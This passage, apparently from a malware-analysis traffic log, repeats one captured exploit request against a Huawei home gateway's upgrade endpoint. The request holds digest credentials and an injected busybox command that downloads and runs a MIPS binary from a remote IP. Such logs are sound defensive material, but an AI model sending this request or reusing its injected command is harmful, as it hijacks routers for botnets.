HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://185.196.10.215/bins/mips; /bin/busybox chmod 777 * atp.mips; ./atp.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 31 30 2e 32 31 35 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 61 74 70 2e 6d 69 70 73 3b 20 2e 2f 61 74 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 